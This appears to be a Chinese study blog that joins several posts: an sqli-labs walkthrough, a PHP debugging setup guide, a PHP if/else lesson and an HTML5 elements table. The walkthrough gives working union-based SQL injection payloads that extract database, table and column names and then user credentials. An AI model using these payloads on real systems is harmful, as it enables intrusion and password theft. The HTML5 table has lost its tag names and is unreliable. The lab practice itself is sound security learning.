sqli-labs

前两关

输入?id=1和?id=2 和?id=2-1

若2-1的结果和2一样则为字符型 若2-1 和1的结果一样则为数字型

然后确认字段位数 order by 数字一个个试看哪个报错就可确认其为n-1位

确认占位信息 ?id=-1 union select 1,2,3 –+

找库名 ?id=-1 union select 1,2,database()2之后的便是库名

找表名 ?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=’security’–+

找字段名 ?id=-1 union select 1,2,group_concat(column_name) from information_schema.COLUMNs where table_schema=’security’ and table_name=’users’–+

找账号密码 ?id=-1 union select 1,2,group_concat(concat_ws(‘,’,username,password) SEPARATOR ‘|’) from users –+

less 3

Less-3 GET - Error based - Single quotes with twist string (基于错误的GET单引号变形字符型注入)

输入单引号,根据报错信息确定咱们输入的内容存放到一对单引号加圆括号中了,猜想一下咱们输入1在数据库语句中的位置,形如select … from … where id=(‘1’) …,在第一题中id=1‘的后面单引号加上),其它保持不变就行了

Less-4 GET - Error based - Double Quotes - String (基于错误的GET双引号字符型注入)

输入单引号页面无变化 双引号页面报错 据报错信息判断出咱们输入的内容被放到一队双引号和圆括号中, 猜想一下:select … from … where id=(”1”) …,把第一题中1后面的引号换成双引号加)就可以了

Eclipse for PHP+Wampserver搭建PHP开发环境

过程

1.直接安装Eclipse与wampserver

2.配置wampserver

用notepad打开C:\wamp\bin\apache\Apache2.4.33\bin下的php.ini,
找到最后几行中

[xdebug]
zend_extension =”c:/wamp64/bin/php/php5.6.35/zend_ext/php_xdebug-2.5.5-5.6-vc11-x86_64.dll”
xdebug.remote_enable = on
xdebug.profiler_enable = on
xdebug.profiler_enable_trigger = on
xdebug.profiler_output_name = cachegrind.out.%t.%p
xdebug.profiler_output_dir =”c:/wamp64/tmp”
xdebug.show_local_vars=0

3.配置Eclipse

进入eclipse时选择工作区一定要选择在wamp的www目录,才能便于调试

第一步

进入界面后,在中间选择add PHP Executable,如图添加php.exe与php.ini

第二布

配置PHP server,设置默认就好

第三步

配置PHP debug

第四步

page

PHP If…Else 语句

条件语句用于根据不同条件执行不同动作。

PHP 条件语句

当您编写代码时,您常常需要为不同的判断执行不同的动作。您可以在代码中使用条件语句来完成此任务。

在 PHP 中,提供了下列条件语句:

  • if 语句 - 在条件成立时执行代码
  • if…else 语句 - 在条件成立时执行一块代码,条件不成立时执行另一块代码
  • if…elseif….else 语句 - 在若干条件之一成立时执行一个代码块
  • switch 语句 - 在若干条件之一成立时执行一个代码块

PHP - if 语句

if 语句用于仅当指定条件成立时执行代码

语法

1
2
3
4
if (条件)
{
    条件成立时要执行的代码;
}

如果当前时间小于 20,下面的实例将输出 “Have a good day!”:

实例

PHP - if…else 语句

在条件成立时执行一块代码,条件不成立时执行另一块代码,请使用 if….else 语句。

语法

if (条件)
{
条件成立时执行的代码;
}
else
{
*条件不成立时执行的代码;
*}

如果当前时间小于 20,下面的实例将输出 “Have a good day!”,否则输出 “Have a good night!”:

实例

PHP - if…elseif….else 语句

在若干条件之一成立时执行一个代码块,请使用 if….elseif…else 语句。.

语法

1
2
3
4
5
6
7
8
9
10
11
12
if (条件)
{
    if 条件成立时执行的代码;
}
elseif (条件)
{
    elseif 条件成立时执行的代码;
}
else
{
    条件不成立时执行的代码;
}

如果当前时间小于 10,下面的实例将输出 “Have a good morning!”,如果当前时间不小于 10 且小于 20,则输出 “Have a good day!”,否则输出 “Have a good night!”:

实例

page11

HTML5 添加了很多语义元素如下所示:

标签 描述
定义页面独立的内容区域。
定义页面的侧边栏内容。
允许您设置一段文本,使其脱离其父元素的文本方向设置。
定义命令按钮,比如单选按钮、复选框或按钮
用于描述文档或文档某个部分的细节
定义对话框,比如提示框
标签包含 details 元素的标题
规定独立的流内容(图像、图表、照片、代码等等)。
定义
元素的标题
定义 section 或 document 的页脚。
定义了文档的头部区域
定义带有记号的文本。
定义度量衡。仅用于已知最大和最小值的度量。
定义导航链接的部分。
定义任何类型的任务的进度。
定义 ruby 注释(中文注音或字符)。
定义字符(中文注音或字符)的解释或发音。
在 ruby 注释中使用,定义不支持 ruby 元素的浏览器所显示的内容。
定义文档中的节(section、区段)。
定义日期或时间。
规定在文本中的何处适合添加换行符。s